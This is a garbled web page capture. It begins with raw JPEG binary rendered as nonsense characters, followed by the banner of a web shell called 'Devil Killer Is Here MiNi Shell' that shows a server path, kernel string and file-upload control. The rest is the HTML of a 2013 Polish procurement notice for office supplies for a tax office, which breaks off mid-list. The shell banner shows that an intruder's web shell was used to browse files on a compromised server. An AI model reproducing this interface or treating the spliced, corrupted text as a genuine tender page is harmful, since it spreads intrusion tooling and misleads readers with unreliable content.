JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130617/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130617/232032-N-2013.html

<p class="kh_header"><b>Gorzów Wielkopolski: Sukcesywna dostawa materiałów biurowych dla Urzędu Skarbowego w Gorzowie Wlkp.</b><br>
<b>Numer ogłoszenia: 232032 - 2013; data zamieszczenia: 17.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Skarbowy , ul. Jagiellończyka 10, 66-400 Gorzów Wielkopolski, woj. lubuskie, tel. 095 7115742, faks 095 7228997.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.usgorzow.mf.gov.pl    ; nowy nr faxu 095 7115905</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa materiałów biurowych dla Urzędu Skarbowego w Gorzowie Wlkp..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> PRZEDMIOT I ZAKRES (WIELKOŚĆ) ZAMÓWIENIA: (Lp., Nazwa towaru, Jednostka miary, Ilość, Wg CPV) 1.Koperta C6 z okienkiem w prawym dolnym rogu, biała, samoklejąca o wymiarach 114 x 162 mm; szt. 30000, 30199230-1 Koperty; 2.Koperta C6 zwykła, biała, samoklejąca o wymiarach 114 x 162 mm, szt. 120000, 30199230-1 Koperty, 3.Koperta rozszerzana - E3 brązowa; samoklejąca, o wymiarach 280 x 400 x 40 mm, szt. 3000, 30199230-1 Koperty; 4.Koperta szara, samoklejąca średnia C5 o wymiarach 162 x 229 mm, szt. 8000, 30199230-1 Koperty; 5.Koperta szara, samoklejąca, duża B4 o wymiarach 250 x 353 mm, szt. 3000, 30199230-1 Koperty; 6. Koperta z okienkiem w prawym dolnym rogu - DL, biała, samoklejąca o wymiarach 110 x 220 mm, szt. 90000, 30199230-1 Koperty; 7. Skoroszyt plastikowy przeźroczysty z europerforacją do wpięcia do segregatora, format A4 wykonany z PCV. Zaopatrzony w wymienny pasek papieru do opisu, posiadający nie łamiące się wąsy, szt. 700, 22851000-0 Skoroszyty; 8. Skoroszyt plastikowy, format A4, wykonany z PCV. Przednia okładka przeźroczysta. Zaopatrzony w wymienny pasek papieru do opisu posiadający nie łamiące się wąsy, szt. 400, 22851000-0 Skoroszyty; 9. Skoroszyt tekturowy z oczkami umożliwiającymi wpięcie do segregatora posiadający nie łamiące się wąsy, szt. 1800, 22851000-0 Skoroszyty; 10. Skoroszyt zwykły tekturowy, posiadający nie łamiące się wąsy, szt. 2000, 22851000-0 Skoroszyty; 11. Teczka A4 plastikowa - wiązana, przednia okładka przeźroczysta, szt. 500, 22851000-0 Skoroszyty; 12.Teczka A4 wiązana - kolor biały. Posiada trzy zakładki chroniące dokumenty przed wypadaniem., szt. 43709, 22851000-0 Skoroszyty; 13. Teczka do podpisu (15 - 17 przegródek), szt. 108, 30192000-1 Wyroby biurowe; 14. Koszulka L-ka winna być sztywna, formatu A4, bez możliwości wpięcia do segregatora., szt. 1800, 30192500-6 Okładki przezroczyste; 15.Obwoluta - koszulka o fakturze groszkowej (opak. 100 szt.); koszulka na dokumenty formatu A4, otwierana z góry, wyposażona w grzbiet umożliwiający wpięcie do segregatora, op. 300, 30192500-6
Okładki przezroczyste; 16.Spinacz biurowy duży zwykły 50 mm (opak. 100 szt.) wykonany z wysokiej jakości drutu sprężynującego niklowanego, op. 100, 30197220-4 Spinacze do papieru; 17. Spinacz biurowy mały 28 mm (opak. 100 szt.) wykonany z wysokiej jakości drutu sprężynującego niklowanego, op. 300, 30197220-4 Spinacze do papieru 18. Zszywacz do zszywania 100 kart, szt. 30, 30197320-5 Zszywacze; 19.Zszywacz zwykły biurowy na zszywki o wymiarze 24/6. Wykonany z metalu, szt. 80, 30197320-5 Zszywacze; 20. Zszywki 23/10 (opakowanie 1000 szt.), op. 20, 30197100-7 Zszywki, gwoździki z szerokim łebkiem, pinezki kreślarskie; 21.Zszywki stalowe cynkowe 24/6 (opak. 1000 szt.), op. 514, 30197100-7 Zszywki, gwoździki z szerokim łebkiem, pinezki kreślarskie; 22.Dziurkacz mały, ma dziurkować minimalnie 1 kartkę 80 g, a maks. 20 kartek 80 g, szt. 40, 30197330-8 Dziurkacze; 23.Dziurkacz żeliwny, ma dziurkować minimalnie 1 kartkę 80 g, a maks. 40 kartek 80 g , szt. 14, 30197330-8 Dziurkacze, 24.Dziurkacz duży, ma dziurkować minimalnie 1 kartkę 80 g, a maks. 100 kartek 80 g z długą ruchomą rączką, szt. 10, 30197330-8 Dziurkacze; 25. Cienkopis, tusz kolor: czarny/czerwony/zielony/niebieski, linia pisania nie grubsza niż 0,4 mm, długość linii pisania nie krótsza niż 1500 m, szt.	700, 39292400-9 Przybory do pisania, 26.Długopis automatyczny typu ZENITH lub równoważny o średnicy do 10 mm z metalową końcówką, szt. 220, 39292400-9 Przybory do pisania, 27.Wkłady do długopisu automatycznego typu ZENITH lub równoważnego wymienionego w poz. 26, szt. 600, 39292400-9 Przybory do pisania; 28.Długopis na pulpit - możliwość mocowania w pozycji pionowej i poziomej, długość sprężynki po rozciągnięciu 1,0-1,5m, szt. 280, 39292400-9 Przybory do pisania; 29.Długopis zwykły (tusz kolor: niebieski/ czarny/ zielony/ czerwony) z wymiennym wkładem i metalową końcówką - gr. linii 0,5 - 0,7 mm, szt. 500, 39292400-9 Przybory do pisania; 30.Wkłady z metalową końcówką (tusz kolor: niebieski/ czarny/ zielony/ czerwony) gr. linii 0,5 - 0,7 mm do długopisu zwykłego wymienionego w poz. 29., szt. 274, 39292400-9 Przybory do pisania; 31.Ołówek biurowy drewniany HB, szt. 150, 30192130-1 Ołówki; 32.Pisak (tusz kolor: czarny /niebieski /zielony/ czerwony, szt. 334	,30192125-3 Pisaki; 33.Pisak wodoodporny, szt. 150, 30192125-3 Pisaki, 34. Zakreślacz tekstu o długotrwałym działaniu, dużej odporności na wysychanie, tusz na bazie wody, miękka płynna linia o szerokości nie mniej niż 5 mm, ścięta końcówka pisząca, natychmiastowa trwała fluorescencyjność, szt. 700, 30192125-3 Pisaki, 35.Markery grube (tusz kolor:czerwony/czarny/niebieski/zielony) z okrągłą końcówką do pisania na tablicach białych, szt. 50, 30237430-2 Markery; 36.Zeszyt akademicki format A4, (96 kartek ) miękka oprawa, białe kartki w kratkę, szt. 50, 30192000-1 Wyroby biurowe; 37.Zeszyt akademicki format A4, (96 kartek ) twarda oprawa, białe kartki w kratkę, szt. 50, 30192000-1 Wyroby biurowe, 38.Zeszyt format A5 (60 kartek) białe kartki w kratkę, szt. 81, 30192000-1 Wyroby biurowe; 39.Zeszyt format A5 (96 kartek) białe kartki w kratkę, szt. 101, 30192000-1 Wyroby biurowe; 40.Blok techniczny, kartki koloru białego, format A4, 10 kartek, szt. 50, 22816000-3
Bloki papierowe, 41.Blok z makulatury A4/ 50 kartek, szt.	200, 22816000-3
Bloki papierowe; 42.Blok z makulatury A5/ 50 kartek, szt. 150, 22816000-3
Bloki papierowe; 43. Linijka z tworzywa sztucznego - dł. 20 cm, szt. 60, 39292500-0 Linijki; 44.Linijka z tworzywa sztucznego - długość 30 cm, szt. 50, 39292500-0 Linijki; 45. Nożyczki biurowe 25 cm z ostrzem z nierdzewnej stali. Ergonomiczna rączka z odpornego na pęknięcia tworzywa sztucznego, szt. 60, 39241200-5 Nożyczki; 46.Nożyczki biurowe od 15 cm - 17 cm, z ostrzem z nierdzewnej stali. Ergonomiczna rączka z odpornego na pęknięcia tworzywa sztucznego., szt. 30, 39241200-5 Nożyczki; 47.Korektor w płynie (w długopisie - metalowa końcówka) szybkoschnący, pojemność nie mniej niż 8 ml, szt.140, 30192160-0 Korektory; 48. Korektor w płynie (z pędzelkiem) szybkoschnący, pojemność nie mniej niż 20 ml, szt.60, 30192160-0 Korektory; 49.Kostka papierowa na biurko 83 mm x 83 mm (500 arkuszy w kostce) koloru białego, szt. 500, 22816100-4 Bloczki notatkowe; 50. Kostka papierowa samoprzylepna 75 mm x 75 mm (100 arkuszy w kostce), szt. 600, 22816300-6 Bloczki samoprzylepnych karteczek na notatki; 51.Segregator szeroki A4. Szerokość grzbietu 70 mm posiadający mechanizm dźwigniowy z dociskaczem, szt. 2625, 30199500-5 Segregatory, pudełka na listy, pudełka do przechowywania i podobne wyroby; 52.Segregator wąski A4. Szerokość grzbietu 50 mm posiadający mechanizm dźwigniowy z dociskaczem, szt. 328, 30199500-5 Segregatory, pudełka na listy, pudełka do przechowywania i podobne wyroby; 53. Naklejka na segregator samoprzylepna o szerokości 40-50 mm, szt. 300, 22459100-3 Nalepki i taśmy reklamowe; 54.Naklejka na segregator samoprzylepna o szerokości 60-70 mm, szt. 1500; 22459100-3 Nalepki i taśmy reklamowe; 55. Etykiety białe, papierowe, samoprzylepne do drukarki kodów kreskowych ZEBRA TLP 2844 o wymiarach 50 mm x 30 mm (opakowanie-rolka po 1000 szt.), op. 15, 30199760-5 Etykiety; 56.Etykiety białe, papierowe, samoprzylepne do drukarki kodów kreskowych ZEBRA TLP 2844 o wymiarach 75mm x 25 mm (opakowanie-rolka po 1000 szt.), op. 400, 30199760-5 Etykiety; 57.Etykiety białe, termotransferowe, samoprzylepne do drukarki kodów kreskowych ZEBRA TLP 2844; folia propylux; o wymiarach 50mm x 20 mm (opakowanie-rolka po 1000 szt.), op. 240, 30199760-5 Etykiety; 58.Fastykuły bez tasiemek, szt. 4000, 30192000-1 Wyroby biurowe; 59.Tasiemka archiwizacyjna 50 mb - (tasiemka podobna do taśm zamontowanych w teczkach wiązanych), szt. 120, 30192000-1 Wyroby biurowe; 60.Gumka o rozmiarze min. 63,5 x 24 x 9 mm do usuwania zapisów naniesionych ołówkiem lub długopisem nie niszcząca papieru podczas ścierania umożliwiająca delikatne i czyste wymazywanie., szt. 150, 30192100-2 Gumki; 61. Klej w płynie zawierający końcówkę z gąbką, nie marszczący papieru. Pojemność nie mniej niż 40ml, szt. 944, 24910000-6 Kleje; 62.Gumki recepturki - duże (opak. 1 kg) średnica 60 mm, długość 10 cm, op. 20, 19510000-4 Produkty z gumy; 63.	Kalka maszynowa, format A4, wykonana z materiału gwarantującego wielokrotne wykorzystanie arkuszy o gramaturze warstwy kopiującej 10 g/m2 (opakowanie 25 arkuszy), op. 10, 30199110-4 Kalka maszynowa; 64. Pineski (opak. 50 szt.), op. 50, 30197100-7
Zszywki, gwoździki z szerokim łebkiem, pinezki kreślarskie; 65. Plastelina (opak. 10 szt.), op. 35, 30192000-1 Wyroby biurowe; 66.Rozszywasz pozwalający na łatwe usuwanie zszywek z dokumentów. Wykonany z metalu z plastikowymi uchwytami., szt. 60, 30197321-2 Usuwacz zszywek; 67.Taśma do maszyn liczących (57 mm 25 mb) biała, szt. 200, 30145100-8 Rolki do kalkulatorów, 68.Taśma klejąca samoprzylepna (przeźroczysta, szerokość 18 mm, długość 20 m)., szt. 250, 44424200-0 Taśma przylepna; 69.Taśma pakowa, szara z klejem akrylowym o szerokości 48 mm i dł. nie mniejszej niż 50 m., szt. 59, 44424200-0 Taśma przylepna; 70. Temperówka posiadająca stalowe ostrze mocowane wkrętem, szt. 120, 30192133-2 Temperówki do ołówków; 71.Tusz do stempli metalowych w plastikowej butelce (czarny/czerwony) o pojemności nie mniejszej niż 25 ml, szt. 24, 22600000-6 Tusz; 72.Tusz do stempli w plastikowej butelce (czarny), uniwersalny, do każdego rodzaju stempli. Pojemność nie mniej niż 25 ml., szt. 33, 22600000-6 Tusz; 73.Tusz do stempli w plastikowej butelce (czerwony) uniwersalny, do każdego rodzaju stempli. Pojemność nie mniej niż 25 ml., szt. 168, 22600000-6 Tusz; 74.Wąsy do akt, szt. 500, 30192000-1 Wyroby biurowe,
75.Zwilżacz biurowy do palców, glicerynowy, bezbarwny, bezzapachowy, szt. 87, 30192000-1 Wyroby biurowe, 76.Płyty CD-R o pojemności min. 700 MB, szt. 290, 30234300-1 Płyty kompaktowe (CD), 77. Płyty DVD-R o pojemności min. 4,7 GB, szt. 260, 30234400-2 Uniwersalne dyski wideo (DVD); 78.	Taśmy DAT do archiwizacji danych, typ DDS-4, pojemność min. 40 GB, szt. 20, 30237330-1
Kasety z cyfrową taśma dżwiękową (DAT);79.Okładka do dyplomu format A4, szt. 50, 22852100-8 Okładki na akta; 80. Kartki ozdobne na list gratulacyjny, szt. 50, 30199000-0 Papeteria i inne wyroby, 81. Karton tekturowy, zamykany, do składania, mogący pomieścić 5 szt. szerokich pełnych segregatorów formatu A4, szt. 36, 44617100-9 Pudła kartonowe, 82. Papier pakowy szary (arkusz) o wymiarach min. 105 x 126 cm, szt. 160, 30197600-2 Papier i tektura gotowa; 83.Okładka samoprzylepna przeźroczysta , bezbarwna w rolce do samodzielnego przycinania, o wym. 33 x 150 cm, szt. 2, 30192500-6 Okładki przeźroczyste; 84. Marker olejowy, biały, z tuszem szybkoschnącym dozowanym przez zaworek, długość linii pisania min. 2400 m, cienka okrągła końcówka, szt. 4, 30237430-2
Markery; 85.Koperta ochronna z bąbelkami o wym. 165 x 120 mm, szt. 50, 30199230-1 Koperty; 86. Taśmy DAT do archiwizacji danych, typ DAT-72, pojemność min. 72 GB, szt. 10, 30237330-1 Kasety z cyfrową taśma dżwiękową (DAT); 87.Taśmy DAT do archiwizacji danych, typ DAT-160, pojemność min. 160 GB, szt. 10, 30237330-1 Kasety z cyfrową taśma dżwiękową (DAT), 88.Marker do płyt CD/DVD, szt. 4, 30237430-2 Markery, 89. Grzbiet - wsuwka, format A-4 w formie plastikowej rynienki, w którą można wsunąć (oprawić) plik kartek, zaokrąglone końcówki ułatwiające wkładanie dokumentów (do oprawy max 30 kartek), szt 20, 30192000-1 Wyroby biurowe; 90.Klipy biurowe, metalowe, czarne w rozmiarze od 40 mm do 45 mm, szt. 160, 30192000-1 Wyroby biurowe..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.92.30-1, 22.85.10.00-0, 30.19.20.00-1, 30.19.25.00-6, 30.19.72.20-4, 30.19.73.20-5, 30.19.71.00-7, 30.19.73.30-8, 39.29.24.00-9, 30.19.21.30-1, 30.19.21.25-3, 30.23.74.30-2, 22.81.60.00-3, 39.29.25.00-0, 39.24.12.00-5, 30.19.21.60-0, 22.81.61.00-4, 22.81.63.00-6, 30.19.95.00-5, 22.45.91.00-3, 30.19.97.60-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Warunek ten zostanie spełniony, jeżeli Wykonawca przedłoży oświadczenie potwierdzające spełnienie przez Wykonawcę warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych, o którym mowa w Rozdziale I pkt III ppkt 1 lit. a. Oceny spełnienia warunków udziału w postępowaniu o udzielenie zamówienia Zamawiający dokona na podstawie złożonych przez Wykonawcę oświadczeń oraz dokumentów wskazanych w pkt VI. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Warunek ten zostanie spełniony, jeżeli Wykonawca przedłoży oświadczenie potwierdzające spełnienie przez Wykonawcę warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych, o którym mowa w Rozdziale I pkt III ppkt 1 lit. a. Oceny spełnienia warunków udziału w postępowaniu o udzielenie zamówienia Zamawiający dokona na podstawie złożonych przez Wykonawcę oświadczeń oraz dokumentów wskazanych w pkt VI. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Warunek ten zostanie spełniony, jeżeli Wykonawca przedłoży oświadczenie potwierdzające spełnienie przez Wykonawcę warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych, o którym mowa w Rozdziale I pkt III ppkt 1 lit. a. Oceny spełnienia warunków udziału w postępowaniu o udzielenie zamówienia Zamawiający dokona na podstawie złożonych przez Wykonawcę oświadczeń oraz dokumentów wskazanych w pkt VI. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Warunek ten zostanie spełniony, jeżeli Wykonawca przedłoży oświadczenie potwierdzające spełnienie przez Wykonawcę warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych, o którym mowa w Rozdziale I pkt III ppkt 1 lit. a. Oceny spełnienia warunków udziału w postępowaniu o udzielenie zamówienia Zamawiający dokona na podstawie złożonych przez Wykonawcę oświadczeń oraz dokumentów wskazanych w pkt VI. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Warunek ten zostanie spełniony, jeżeli Wykonawca przedłoży oświadczenie potwierdzające spełnienie przez Wykonawcę warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych, o którym mowa w Rozdziale I pkt III ppkt 1 lit. a. Oceny spełnienia warunków udziału w postępowaniu o udzielenie zamówienia Zamawiający dokona na podstawie złożonych przez Wykonawcę oświadczeń oraz dokumentów wskazanych w pkt VI. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
